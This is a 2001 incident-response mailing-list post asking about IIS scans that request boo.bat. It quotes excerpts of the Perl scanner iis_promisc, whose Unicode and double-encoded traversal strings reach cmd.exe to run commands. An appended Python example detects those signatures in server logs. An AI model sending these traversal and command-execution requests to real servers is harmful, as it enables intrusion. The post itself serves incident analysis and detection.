Security Incidents mailing list archives

Re: iis scanning


From: Jordan K Wiens <jwiens () nersp nerdc ufl edu>
Date: Mon, 2 Jul 2001 15:24:15 -0400 (EDT)

Since the SecurityFocus page doesn't actually list the source, I'll quote
the relevant parts below.

For those of you who are curious (I was), someone found me the translation
of MinhaNossaSenhoraDoPerpetuoSocorro.  It means Our Lady of Perpetual
Help, referring to Mary.  Interesting invocation to hack under.

-- 
Jordan Wiens
UF Network Incident Response Team
(352)392-2061

On Mon, 2 Jul 2001, Jordan K Wiens wrote:

Anyone seen an iis scan that attempts to access boo.bat among other
requests along with directory traversal attempts?  I found the source of
the script on the web but no mention is made of what boo.bat is included
for.  Anyone know what this is?

http://www.securityfocus.com/tools/2060






-----------IIS_PROMISC EXCERPTS----------------
#!/usr/bin/perl
#
# iis_promisc v2.0
#
# This is a perl script to test the infamous
# Microsoft IIS holes:
#
# -*- Escaped Characters Decoding Bug
# -*- Unicode Directory Transversal Bug
#
# * Support Proxy Server
# * Over 20 tests will be made ( if found display the patch URL too :)
#
# Added to v2:
#
# -*- Executable File Parsing Bug check
# -*- Over 40 bugs tested! 
#
# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/ 
#   The package libwww is found in many linux distributions
#
# by inode () unsekure com br
# greetz to #unsekure @ irc.brasnet.org
# http://unsekure.com.br
#
# 05/2001

.
. [SNIP]
.

$test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro";
$dir_command = "winnt/system32/cmd.exe?/c+dir";
$iis = "1";

my @dir=(

# You can add more exec dirs here
#"/somedir/",

"/", ## wwwroot
"/scripts/",
"/msadc/",
"/cgi-bin/",
"/bin/",
"/samples/",
"/_vti_cnf/",
"/_vti_bin/",
"/adsamples/",
"/iisadmpwd/",
"/Rpc/",
"/PBServer/");

my @string=(

"..%255c..%255c..%255c..%255c..%255c..%255c",
"..%c0%af../..%c0%af../..%c0%af../",
"..%e0%80%af../..%e0%80%af../..%e0%80%af../",
"boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C");

.
. [SNIP]
.

And the rest is pretty straightforward.  Nothing too tricky.





----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com
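
A defender's view of the excerpt above, as an added example that is not part of the original post or of iis_promisc: Python that flags the script's request signatures (double-encoded and overlong-UTF-8 path separators, cmd.exe, the echo marker, boo.bat) in web server log lines. It generalizes from the four literal strings to any overlong or double-encoded form; the log field layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes
MARKER = b"minhanossasenhoradoperpetuosocorro"  # echo string from the excerpt, lowercased
# Overlong UTF-8 (never valid): C0/C1 lead byte, or E0 followed by 80-9F.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]")

def _collapse(m):
    """Return the character a lenient decoder would produce for an overlong sequence."""
    seq = m.group(0)
    cp = seq[0] & (0x1F if len(seq) == 2 else 0x0F)
    for b in seq[1:]:
        cp = (cp << 6) | (b & 0x3F)
    return chr(cp).encode("utf-8")

def indicators(uri):
    """Name the scan indicators present in one requested URI (stem plus query)."""
    once = unquote_to_bytes(uri)
    twice = unquote_to_bytes(once)  # a second pass exposes %255c -> %5c -> backslash
    norm = OVERLONG.sub(_collapse, twice).replace(b"\\", b"/").lower()
    checks = [
        ("overlong-utf8", OVERLONG.search(twice) is not None),
        ("double-encoding", twice != once),
        ("traversal", b"../" in norm),
        ("cmd.exe", b"cmd.exe" in norm),
        ("echo-marker", MARKER in norm),
        ("boo.bat", b"boo.bat/.." in norm),
    ]
    return [name for name, hit in checks if hit]

def scan(log_lines):
    """Map client IP -> sorted indicators. Assumed layout: date time ip method stem query status."""
    hits = {}
    for line in log_lines:
        f = line.split()
        if len(f) != 7 or line.startswith("#"):
            continue
        uri = f[4] if f[5] == "-" else f[4] + "?" + f[5]
        for name in indicators(uri):
            hits.setdefault(f[2], set()).add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

# Constructed sample lines (documentation addresses), using strings from the excerpt.
SAMPLE = [
    "2001-07-02 15:02:11 192.0.2.10 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 404",
    "2001-07-02 15:02:12 192.0.2.10 GET /msadc/..%c0%af../winnt/system32/cmd.exe /c+echo+MinhaNossaSenhoraDoPerpetuoSocorro 404",
    "2001-07-02 15:02:13 192.0.2.10 GET /scripts/boo.bat/..%C1%9C..%C1%9Cwinnt/system32/cmd.exe /c+dir 404",
    "2001-07-02 15:03:40 192.0.2.77 GET /docs/caf%C3%A9.html - 200",
]
print(scan(SAMPLE))
```

The double-encoding check fires on any URI that still changes on a second decode pass, so treat it as a signal to combine with the traversal or cmd.exe hits rather than as a verdict on its own.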

